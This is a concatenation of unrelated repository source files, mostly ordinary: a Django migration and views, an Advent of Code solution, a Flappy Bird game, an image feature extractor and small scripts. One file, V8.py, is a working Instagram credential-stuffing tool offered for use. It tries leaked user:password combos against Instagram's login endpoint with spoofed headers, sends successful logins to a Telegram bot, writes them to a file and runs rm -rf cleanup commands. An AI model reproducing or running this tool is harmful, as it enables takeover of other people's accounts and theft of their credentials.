field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff'),
),
migrations.CreateModel(
name='EusMedicalStaff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('eus', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='eus_med_staff', to='patient_ill_history.electroultrasoundtherapy')),
('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
],
),
migrations.AddField(
model_name='electroultrasoundtherapy',
name='idMedStaff',
field=models.ManyToManyField(through='patient_ill_history.EusMedicalStaff', to='patient_ill_history.MedicalStaff'),
),
migrations.AddField(
model_name='electroultrasoundtherapy',
name='idStage',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='electro_ultrasound_therapy', to='patient_ill_history.stageoftreatment'),
),
migrations.CreateModel(
name='Comorbidity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('idNameIll', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl025')),
('idSession', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comorbidity', to='patient_ill_history.treatmentsession')),
],
),
migrations.AlterUniqueTogether(
name='surgery',
unique_together={('DateIntervention',)},
),
migrations.AlterUniqueTogether(
name='stageoftreatment',
unique_together={('stageName', 'startStage', 'endStage')},
),
migrations.AlterUniqueTogether(
name='physiotherapy',
unique_together={('namePhysiotherapy', 'valuePhysiotherapy', 'unitPhysiotherapy', 'datePhysiotherapy')},
),
migrations.CreateModel(
name='Pharmacotherapy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('dosePill', models.FloatField()),
('unitPill', models.CharField(max_length=20)),
('datePill', models.DateTimeField()),
('idNamePill', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationclpill')),
('idStage', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pharmacotherapy', to='patient_ill_history.stageoftreatment')),
],
options={
'unique_together': {('dosePill', 'unitPill', 'datePill')},
},
),
migrations.CreateModel(
name='Measurement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('valueMeasurement', models.FloatField()),
('dateMeasurement', models.DateTimeField()),
('idCatalogMeasurement', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.catalogmeasurement')),
('idMedStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
('idState', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='measurement', to='patient_ill_history.state')),
],
options={
'unique_together': {('valueMeasurement', 'dateMeasurement')},
},
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nameImage', models.CharField(max_length=80)),
('hostImage', models.FilePathField()),
('dateImage', models.DateTimeField()),
('idState', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='image', to='patient_ill_history.state')),
],
options={
'unique_together': {('nameImage', 'hostImage', 'dateImage')},
},
),
migrations.AlterUniqueTogether(
name='electroultrasoundtherapy',
unique_together={('nameEus', 'valueEus', 'unitEus', 'dateEus')},
),
]
|
[
"angelicaannalilia@gmail.com"
] |
angelicaannalilia@gmail.com
|
a31963fd4f94c414e2441d015b5cce90aa09af2b
|
c18b555774293cf7170a35d09722f7cb753d71d7
|
/D11_1_works_on_test.py
|
89d49ecd06d822f3174a7991b792918b4c616a51
|
[] |
no_license
|
Jake-Jasper/AOC_2020
|
17bf15445313793075019c00e4c92cbed0d081bf
|
a3156198ca29f32d885ded36aa2947def09bda80
|
refs/heads/main
| 2023-02-09T15:58:44.461895
| 2021-01-05T21:21:50
| 2021-01-05T21:21:50
| 317,528,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,686
|
py
|
'''
If a seat is empty (L) and there are no occupied seats adjacent to it, the seat becomes occupied.
If a seat is occupied (#) and four or more seats adjacent to it are also occupied, the seat becomes empty.
Otherwise, the seat's state does not change.
. = FLoor
L = Empty seat
occupied seat = #
'''
import pprint, copy
test_case = '''\
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
'''
test_case = test_case.splitlines()
test_case = [list(i) for i in test_case]
AOC = open('D11_data', 'r').read().splitlines()
AOC = [list(i) for i in AOC]
def convolve(arr):
# arr[i][j] is current seat
new = copy.deepcopy(arr)
for i in range(1, len(arr)-1):
for j in range(1,len(arr[0])-1):
seat = arr[i][j]
adjacent = arr[i-1][j-1:j+2] + arr[i][j-1:j+2] + arr[i+1][j-1:j+2]
adjacent.remove(seat)
if seat == 'L' and '#' not in adjacent:
new[i][j] = '#'
elif seat == '#' and adjacent.count('#') >= 4:
new[i][j] = 'L'
return new, arr
def pad(arr):
## pad arr
for i in arr:
i.insert(0, '.')
i.insert(len(i), '.')
arr.insert(0,['.']*len(arr[0]))
arr.insert(len(arr[0]),['.']*len(arr[0]))
return arr
AOC = pad(AOC)
test_case = pad(test_case)
def compute(arr):
new, arr = convolve(arr)
if new == arr:
print(sum(line.count('#') for line in new))
return new
else:
compute(new)
# This is off by 13 for some reason, on my data. The answer should be 2368, which is what I got when running anthony's code
compute(test_case)
|
[
"jake@pc.home"
] |
jake@pc.home
|
3220c25bb055c62542f30c5c94ea0e8a33be745f
|
3d32dad4f5476d369d4f5510291ec55fbe8700b1
|
/Python_Scrpting/venv/bin/pip3
|
1f7788fef281aab06b8e35d7b14725426b14568e
|
[] |
no_license
|
Mancancode/Python
|
59e0af3b33e4d0453f56686e4814638d0f123020
|
10b3a79f8db403dcc535517b2bd8bc4bbf12263c
|
refs/heads/master
| 2020-03-20T15:23:08.119951
| 2018-06-16T02:31:24
| 2018-06-16T02:31:24
| 137,511,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
#!/home/manmiliki/PycharmProjects/Python_Scrpting/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
|
[
"achonwaechris@outlook.com"
] |
achonwaechris@outlook.com
|
|
df8e98d1b351ecf9fb077a510c1ae2960a718e84
|
fcb3d6477c2e8e0c13676dfd01dc866be8965ad0
|
/featureExtraction.py
|
3b976010ec832074c8629e7685dd617feb5d5198
|
[] |
no_license
|
monikaban/captionGeneration
|
7de2b59679799b63ad0a04507b6393ffb090bb55
|
aeb5e103b5fd8cc4de24dbcee17e1d3f2fa08f99
|
refs/heads/master
| 2020-04-21T11:13:14.435305
| 2019-02-13T00:59:23
| 2019-02-13T00:59:23
| 169,515,848
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,421
|
py
|
from os import listdir
from pickle import dump
from keras.applications.vgg16 import VGG16
from keras.preprocessing.image import load_img
from keras.preprocessing.image import img_to_array
from keras.applications.vgg16 import preprocess_input
from keras.models import Model
# extract features from each photo in the directory
def extract_features(directory):
# load the model
model = VGG16()
# re-structure the model
model.layers.pop()
model = Model(inputs=model.inputs, outputs=model.layers[-1].output)
# summarize
print(model.summary())
# extract features from each photo
features = dict()
for name in listdir(directory):
# load an image from file
filename = directory + '/' + name
image = load_img(filename, target_size=(224, 224))
# convert the image pixels to a numpy array
image = img_to_array(image)
# reshape data for the model
image = image.reshape((1, image.shape[0], image.shape[1], image.shape[2]))
# prepare the image for the VGG model
image = preprocess_input(image)
# get features
feature = model.predict(image, verbose=0)
# get image id
image_id = name.split('.')[0]
# store feature
features[image_id] = feature
# print('>%s' % name)
return features
# extract features from all images
directory = 'Flicker8k_Dataset'
features = extract_features(directory)
print('Extracted Features: %d' % len(features))
# save to file
dump(features, open('features.pkl', 'wb'))
|
[
"noreply@github.com"
] |
monikaban.noreply@github.com
|
805776c9d109712adad22be2a5ff49a4bae5dd2d
|
3ad602c5a4225d0a23adfb3c3bc6b2b8b596349a
|
/main.py
|
e65c52014646f5bd1d859d74eee914dc4836ff6a
|
[
"MIT"
] |
permissive
|
samraisbeck/QuickAccess
|
79c833a80af6cad10017ba1711938463aabec9f8
|
3a3f13a32f3e22eafbed4ea3ec5972108caa24ac
|
refs/heads/master
| 2021-01-01T20:45:21.795857
| 2017-08-10T18:56:59
| 2017-08-10T18:56:59
| 98,926,888
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,570
|
py
|
from PySide import QtCore, QtGui
import yaml
from subprocess import *
import os, sys
from widgetInternet import WidgetInternet
class ProgramManager(QtGui.QMainWindow):
def __init__(self):
super(ProgramManager, self).__init__()
self.programs = None
self.keys = []
self.readConfig()
self._InternetOptions = WidgetInternet(parent=self)
self._initUI()
def readConfig(self):
try:
with open('config.yaml', 'r') as f:
try:
self.programs = yaml.safe_load(f)
except yaml.YAMLError:
print 'Could not read config.yaml.'
raise
except IOError:
print 'Could not find the config.yaml file.'
raise
if self.programs is not None:
self.keys = self.programs.keys()
def _initUI(self):
if self.programs == None:
print 'No programs configured. Exiting...'
sys.exit(0)
cols = 3
grid = QtGui.QGridLayout()
self._createToolbar()
label = QtGui.QLabel('QuickAccess', parent=self)
font = QtGui.QFont()
font.setBold(True)
font.setPointSize(13)
label.setFont(font)
grid.addWidget(label, 0, 0, alignment=QtCore.Qt.AlignHCenter)
grid.addWidget(self._InternetOptions, 1, 0, alignment=QtCore.Qt.AlignHCenter)
separator = QtGui.QFrame()
separator.setFrameShape(QtGui.QFrame.HLine)
separator.setFrameShadow(QtGui.QFrame.Sunken)
grid.addWidget(separator, 2, 0)
buttonGrid = QtGui.QGridLayout()
for i in range(len(self.programs)):
button = QtGui.QPushButton(self.keys[i], parent=self)
self.connect(button, QtCore.SIGNAL('pressed()'), self.launchProgram)
buttonGrid.addWidget(button, i/cols, i%cols)
grid.addLayout(buttonGrid, 3, 0)
Qw = QtGui.QWidget()
Qw.setLayout(grid)
self.setCentralWidget(Qw)
self.setWindowTitle('QuickAccess for '+os.environ['USERNAME']+' on '+os.environ['COMPUTERNAME'])
self.show()
def _createToolbar(self):
m = QtGui.QMenu('Options', parent=self)
option = QtGui.QAction('View History', m)
# option.setShortcut('Ctrl+H')
option.setStatusTip('View URL history.')
option.triggered.connect(self.viewHistory)
m.addAction(option)
option = QtGui.QAction('Delete History', m)
# option.setShortcut('Ctrl+L')
option.setStatusTip('Delete current URL history.')
option.triggered.connect(self._InternetOptions.clearHistory)
m.addAction(option)
self.menuBar().addMenu(m)
def launchProgram(self):
button = self.sender()
text = button.text()
try:
if self.programs[text][-3:] == '.py':
Popen([sys.executable, self.programs[text]], cwd = os.path.dirname(self.programs[text]))
elif os.sep[0] in self.programs[text]:
# this is the case where we give something you would double click to start, like an executable
Popen([self.programs[text]], cwd = os.path.dirname(self.programs[text]))
else:
# this is the case where we give a program name like "chrome".
os.system("start "+self.programs[text])
except:
print "Could not open "+self.programs[text]
raise
def viewHistory(self):
history = self._InternetOptions.history
grid = QtGui.QGridLayout()
grid.addWidget(QtGui.QLabel('URL History', parent=None),0, 0, alignment=QtCore.Qt.AlignHCenter)
edit = QtGui.QTextEdit(parent=None)
edit.setReadOnly(True)
editStr = ''
if len(history) == 0:
editStr += 'History is empty!'
for item in history:
editStr += item[0]+' -> '+str(item[1])+'\n'
edit.setText(editStr)
grid.addWidget(edit)
Qw = QtGui.QWidget(parent=self)
Qw.setLayout(grid)
Qw.setWindowFlags(QtCore.Qt.Window)
Qw.show()
def closeEvent(self, event):
history = self._InternetOptions.history
if not history == []:
with open('history.txt', 'w') as f:
for item in history:
f.write(item[0]+' '+str(item[1])+'\n')
f.close()
super(ProgramManager, self).closeEvent(event)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
mw = ProgramManager()
app.exec_()
|
[
"ssraisbeck10@gmail.com"
] |
ssraisbeck10@gmail.com
|
854da1c656400983050897ea2995f5f55d468357
|
859e95b9b3a2c21b79eb3bb6eac85ba5463ac95c
|
/Flappy_Bird/flappy.py
|
8092a9503e9c62f0ecaa6cbc893820a118edd98b
|
[] |
no_license
|
kushnayak/PyGame
|
a0c1314bc5d2b82c138ebeaf14f3a1ea824e8896
|
493254f8c62caec87d17e2de626f9b9042b529b9
|
refs/heads/master
| 2022-12-24T08:23:44.303494
| 2020-10-03T03:46:50
| 2020-10-03T03:46:50
| 263,222,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,863
|
py
|
def flappy():
import pygame,random, math,time
pygame.init()
carryOn = True
screen = pygame.display.set_mode((1000, 600))
over = pygame.font.Font('freesansbold.ttf',160)
background = pygame.image.load('./Resources/clouds.png').convert()
flappyicon = pygame.image.load("./Resources/flap.png")
pygame.display.set_icon(flappyicon)
ychange = 5
pipechange = -10
angle = 0
adjustx = 0
adjusty = 0
birdx = 300
birdy = 300
currentpipex = 1000
nextpipex = 500
pipey= -500
scorex = 10
scorey = 10
pipepoints = []
diffpipes = []
for x in range(3):
diffpipes.append(pygame.image.load("./Resources/Top Pipe.png"))
diffpipes.append(pygame.image.load("./Resources/Bottom Pipe.png"))
pipepoints.append(random.randint(-900,-500))
flappy = pygame.image.load('./Resources/flap.png')
angry_bird = pygame.image.load('./Resources/angry-bird-icon.png')
toppipe = pygame.image.load("./Resources/Top Pipe.png")
bottompipe = pygame.image.load("./Resources/Bottom Pipe.png")
score_ = 0
font = pygame.font.Font('freesansbold.ttf',32)
over = pygame.font.Font('freesansbold.ttf',60)
def player(x,y,tilt):
flap = pygame.transform.rotate(angry_bird,tilt)
screen.blit(flap,(x,y))
def pipes(x,y):
screen.blit(toppipe,(x,y))
screen.blit(bottompipe,(x,y+1070))
def isCollison(birdx,birdy,pipex,pipey):
topy = pipey + 940
bottomy = topy + 120
actualx = pipex + 25
birdx += 40
birdy += 40
possible = []
possible.extend([(birdx, birdy),(birdx, birdy + 30),(birdx + 30, birdy), (birdx, birdy - 30),(birdx - 30, birdy),(birdx + 30, birdy + 30),(birdx + 30, birdy - 30), (birdx - 30, birdy + 30),(birdx - 30, birdy- 30 )])
for z in possible:
x = z[0]
y = z[1]
if ((actualx - 30) <= x <= (actualx + 30)) and (topy <= y <= bottomy):
return True
elif ((actualx - 30) <= x <= (actualx + 30)) and (y > topy or y < bottomy):
return False
def game_over():
over_ = over.render('GAME OVER',True, (0,0,0))
screen.blit(over_, (500,300))
def show_score(x,y):
score = font.render('Score: ' + str(score_),True, (255,255,255))
screen.blit(score,(x,y))
print(pipepoints[1])
print(diffpipes)
while carryOn:
screen.blit(background,(0,0))
for event in pygame.event.get():
if event.type == pygame.QUIT:
carryOn= False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
ychange = -4
angle = 45
if event.type == pygame.KEYUP:
if event.key == pygame.K_SPACE:
ychange = 5
angle = -20
if event.type == pygame.MOUSEBUTTONDOWN:
print(f"Pipe System: {(currentpipex,pipey)} Pipe clicked: {pygame.mouse.get_pos()}")
print(f"Bird System: {(birdx, birdy)} Bird clicked: {pygame.mouse.get_pos()}")
birdy += ychange
currentpipex+= pipechange
player(birdx,birdy,angle)
pipes(currentpipex,pipey)
if currentpipex <= 0:
currentpipex = 1000
pipey = random.randint(-900,-500)
if birdy <=-64:
birdy=-64
if isCollison(birdx,birdy,currentpipex,pipey) is True:
score_ += 1
if isCollison(birdx,birdy,currentpipex,pipey) is False or birdy >= 530:
ychange = 0
pipechange = 0
display = over.render('GAME OVER',True,(0,0,0))
screen.blit(display,(300,300))
pygame.display.update()
show_score(scorex,scorey)
pygame.display.update()
|
[
"kushnayak123@gmail.com"
] |
kushnayak123@gmail.com
|
ed3204d0b15b6947335c928946e23a11a5818bd2
|
e0e4673fa8aff88c46f08e8ba775a98e501b1944
|
/pythonbasico/ejercicio19.py
|
adf8932e5fe16c20fac46eb7b0ab67a8334abd32
|
[] |
no_license
|
xjhruiz/Proyectos
|
9cf989db2671703ad0b4b28438582a4ff1224399
|
0883a2722d4107bb6f9ca2edf8f87e6fa4e430cb
|
refs/heads/master
| 2022-12-06T22:12:16.118811
| 2021-08-31T12:39:33
| 2021-08-31T12:39:33
| 231,554,283
| 0
| 0
| null | 2022-11-24T09:28:02
| 2020-01-03T09:22:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 495
|
py
|
'''
Created on 24 feb. 2018
@author: Jhonatan
'''
#hacer 23 y 16
repetido = False
cont=0
datos = [0,0,0,0,0,0,0,0,0,0]
for i in range(0,10):
datos[i]=input("Introduzca el numeros {} ".format(i+1))
print datos
for i in range(len(datos)-1,0,-1):
if datos[i] in datos[:i]:
repetido =True
if repetido == False:
print "no hay ningun numero repetido"
else:
print"hay algun numero repetido"
|
[
"noreply@github.com"
] |
xjhruiz.noreply@github.com
|
9f6615d52dac754d42b5b7e518b68cdc0071e6a3
|
020426cc34f5f98aa2998ce61e5f9a36355292eb
|
/V8.py
|
1fa6ff3518a53fc3b00ecf2f0b49a0a9f386e018
|
[] |
no_license
|
j2s20202929292j22n/V8
|
728620af72ca234a71d014c6a95b8527b7bf9c89
|
548fa7d7a8cb6b3a06a5b4de4e7dbd2fddbd3be3
|
refs/heads/main
| 2023-07-09T11:09:52.383862
| 2021-08-14T11:18:44
| 2021-08-14T11:18:44
| 395,819,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,595
|
py
|
#Update
import requests, sys, os, random, time, user_agent
import os,sys
os.system('rm -rf .daxl1.py ;rm -rf /sdcard/download/.daxl1.py ;clear')
import subprocess
import json
bad=0
hits=0
timeout=0
error=0
checkpoint=0
##################
os.system("clear")
os.system("rm -rf .Cheker.py")
os.system("cd .. ;cd home ;rm -rf Cheker.py ;clear")
os.system('clear')
os.system('rm -rf list.txt')
os.system('id -u > list.txt')
uidd = open('list.txt', 'r')
for j in uidd:
sp = j.split()
def chk():
uuid = str(os.geteuid()) + str(os.getlogin())
id = "-".join(uuid)
print("\n\n\x1b[37;1mYour ID : "+id)
try:
httpCaht = requests.get("https://raw.githubusercontent.com/MrTLYAKI/list.txt/main/list.txt").text
if id in httpCaht:
print("\033[92mYOUR ID IS ACTIVE.........\033[97m")
msg = str(os.geteuid())
time.sleep(1)
pass
else:
print("\x1b[91mID ACTIVE NYa bo kren nama bnera @lililliilliil\033[97m")
time.sleep(1)
sys.exit()
except:
sys.exit()
if name == '__main__':
chk()
chk()
wd = "\033[90;1m"
GL = "\033[96;1m"
BB = "\033[34;1m"
YY = "\033[33;1m"
GG = "\033[32;1m"
WW = "\033[0;1m"
RR = "\033[31;1m"
CC = "\033[36;1m"
B = "\033[34m"
Y = "\033[33;1m"
G = "\033[32m"
W = "\033[0;1m"
R = "\033[31m"
logo1=G+'''
888888b. Y88b d88P 888b 888
888 "88b Y88b d88P 8888b 888
888 .88P Y88o88P 88888b 888
8888888K. Y888P 888Y88b 888
888 "Y88b d888b 888 Y88b888
888 888 d88888b 888 Y88888
888 d88P d88P Y88b 888 Y8888
8888888P" d88P Y88b 888 Y888
'''+W+''' ---------------------------------------------------
'''+wd+'''
'''+W+'''---------------------------------------------------'''
logo2=G+'''
888888b. Y88b d88P 888b 888
888 "88b Y88b d88P 8888b 888
888 .88P Y88o88P 88888b 888
8888888K. Y888P 888Y88b 888
888 "Y88b d888b 888 Y88b888
888 888 d88888b 888 Y88888
888 d88P d88P Y88b 888 Y8888
8888888P" d88P Y88b 888 Y888
'''+W+''' ---------------------------------------------------
'''+wd+'''Author : TLYAK
Tool New =======BNX===========
Tlegram : Team_cod3r_1
Note : 10$
'''+W+''' ---------------------------------------------------
=====BNX=====
'''+W+''' ---------------------------------------------------
'''+wd+''' == Wait = 1hmin = 2h ===
'''+W+''' ---------------------------------------------------
'''
print(logo1)
agar=input(" send good tlegram Y/N ")
if agar=='y' or agar=='' or agar=='Y' or agar=='' or agar=='':
ID=input(" ID Telegram :")
token=input(" Token(bot) : ")
else:
pass
print(W+' ---------------------------------------------------')
time.sleep(1)
import json, requests, user_agent,os ,sys, time, datetime
import requests
from user_agent import generate_user_agent
from datetime import datetime
os.system("rm -rf .daxl1.py")
try:
os.remove(".daxl1.py")
except:
pass
os.system("clear")
bad=0
timeout=0
hits=0
checkpoint=0
error=0
def instagram1():
import json, requests, user_agent,os ,sys, time, datetime
import requests
from user_agent import generate_user_agent
from datetime import datetime
r = requests.session()
import os, sys
def loopPp():
try:
combo=input(" Name Combo:")
file = open(combo,'r').read().splitlines()
global bad, timeout, checkpoint, error, hits, ID, token
for line in file:
user = line.split(':')[0]
pasw = line.split(':')[1]
url = 'https://www.instagram.com/accounts/login/ajax/'
head = {
'accept':'*/*',
'accept-encoding':'gzip,deflate,br',
'accept-language':'en-US,en;q=0.9,ar;q=0.8',
'content-length':'269',
'content-type':'application/x-www-form-urlencoded',
'cookie':'ig_did=77A45489-9A4C-43AD-9CA7-FA3FAB22FE24;ig_nrcb=1;csrftoken=VOPH7fUUOP85ChEViZkd2PhLkUQoP8P8;mid=YGwlfgALAAEryeSgDseYghX2LAC-',
'origin':'https://www.instagram.com',
'referer':'https://www.instagram.com/',
'sec-fetch-dest':'empty',
'sec-fetch-mode':'cors',
'sec-fetch-site':'same-origin',
'user-agent': generate_user_agent() ,
'x-csrftoken':'VOPH7fUUOP85ChEViZkd2PhLkUQoP8P8',
'x-ig-app-id':'936619743392459',
'x-ig-www-claim':'0',
'x-instagram-ajax':'8a8118fa7d40',
'x-requested-with':'XMLHttpRequest'}
time_now = int(datetime.now().timestamp())
data = {
'username': user,
'enc_password': "#PWD_INSTAGRAM_BROWSER:0:"+str(time_now)+":"+str(pasw),
'queryParams': {},
'optIntoOneTap': 'false',}
login = requests.post(url,headers=head,data=data,allow_redirects=True,verify=True).text
try:
if '"authenticated":false' in login:
os.system("clear")
print(logo2)
bad+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+' Eror'+W+' :'+B+' '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
elif '"message":"Please wait a few minutes before you try again."' in login:
os.system("clear")
print(logo2)
timeout+=1
import time
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
elif 'userId' in login:
os.system("clear")
print(logo2)
hits+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
boooom=f"GOOD: "+user+":"+pasw
r.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={boooom}\n')
with open('/sdcard/Good(instgram).txt', 'a') as ff:
ff.write(f"\nuser&num&emil: "+user+":"+pasw)
elif ('"message":"checkpoint_required"') in login:
os.system("clear")
print(logo2)
checkpoint+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
else:
os.system("clear")
print(logo2)
error+=1
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+' Time '+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
except:
print(f' '+W+'['+G+'+'+W+']'+G+' Hacked '+W+':'+G+' '+str(hits)+' \n '+W+'['+R+'-'+W+']'+R+' CP '+W+':'+R+' '+str(checkpoint)+' \n '+W+'['+wd+'-'+W+']'+wd+' Bad '+W+':'+wd+' '+str(bad)+' \n '+W+'['+Y+'='+W+'] '+Y+'Time'+W+': '+str(timeout)+' \n'+W+' ['+B+'-'+W+']'+B+''+W+' :'+B+' Eror '+str(error)+'\n'+wd+' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n',end='')
except FileNotFoundError:
print(" [ ! comboka la mobilet a nia ean Path halaya ! ]")
loopPp()
print("\n\n It's Over !\n File saved : /sdcard/[hits or checkpoint].txt")
instagram1()
|
[
"noreply@github.com"
] |
j2s20202929292j22n.noreply@github.com
|
baa48a422d44d84d04017a4899e5d56c666116e8
|
c591f5676468a7447f0e4f104c4889debb35c051
|
/resources/product.py
|
2fafbec78b86e12bf3dca5860bebd79c8efc4620
|
[] |
no_license
|
zhagyilig/Adahome
|
3f3bc1b664bd65964b8befa78405c07da3c8a228
|
76f08be7c21e90bb58803aa1c11be59f66332f42
|
refs/heads/dev
| 2022-12-12T11:51:30.341859
| 2019-07-10T04:22:12
| 2019-07-10T04:22:12
| 149,948,322
| 2
| 4
| null | 2022-12-08T01:01:36
| 2018-09-23T04:39:23
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,566
|
py
|
# coding=utf-8
# auth: zhangyiling
from django.views.generic import ListView, View, TemplateView # 需要返回json数据就用View
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect
from django.contrib.auth.models import User
from django.http import JsonResponse
from .forms import ProductForm # 表单验证
from resources.models import Product, Idc
import json
'''
1. 业务线
'''
class AddProductTemView(LoginRequiredMixin, TemplateView):
template_name = 'resources/server/add_product.html'
def get_context_data(self, **kwargs):
context = super(AddProductTemView, self).get_context_data(**kwargs)
context['userlist'] = User.objects.filter(is_superuser=False) # 过滤超级管理员
context['products'] = Product.objects.filter(pid__exact=0) # 精确匹配
return context
def post(self, request):
'''
获取添加业务线表单的数据
:param request:
:return:
'''
print(request.POST)
product_form = ProductForm(request.POST) # 验证提交的数据
# 测试:
# product_form.is_valid()
# return JsonResponse({'status': 'success'})
if product_form.is_valid(): # 验证数据
pro = Product(**product_form.cleaned_data) # cleaned_data 获取数据
try:
pro.save()
return redirect('success', next='product_manage')
except Exception as e:
return redirect('error', next='product_manage', msg=e.args)
else:
error_msg = json.dumps(json.loads(product_form.errors.as_json()), ensure_ascii=False)
return redirect('error', next='product_manage', msg=error_msg)
'''
2. 业务线管理
'''
class ProductManageTemView(LoginRequiredMixin, TemplateView):
template_name = 'resources/server/product_manage.html'
def get_context_data(self, **kwargs):
context = super(ProductManageTemView, self).get_context_data(**kwargs)
context['ztree'] = Ztree().get() # 前端var zNodes = {{ ztree|safe }};
return context
'''
3. ztree显示业务线树状
'''
class ZnodeView(LoginRequiredMixin, View):
def get(self, request):
ztree = Ztree()
znode = ztree.get()
print('zonde: ', znode)
return JsonResponse(znode, safe=False)
class Ztree(object):
def __init__(self):
self.data = self.get_product()
def get_product(self):
# 获取Product表的数据
return Product.objects.all()
def get(self, idc=False):
'''
处理一级业务线
:return:
'''
ret = []
for p in self.data.filter(pid=0):
print('p :', p)
node = {
'name': p.service_name,
'id': p.id,
'pid': p.pid,
'children': self.get_children(p.id), # 二级业务线的pid是一级业务线的id
'isParent': 'true', # 这里是js中的true
}
ret.append(node)
if idc:
return self.get_idc(ret)
else:
return ret
def get_children(self, id):
'''
处理二级业务线
:param id: 一级业务线的id,就是二级业务线的pid
:return:
'''
ret = []
for p in self.data.filter(pid=id): # 二级业务线的pid是一级业务线的id
print('get_children: ', p)
node = {
'name': p.service_name,
'id': p.id,
'pid': p.pid,
}
ret.append(node)
return ret
def get_idc(self, nodes):
'''
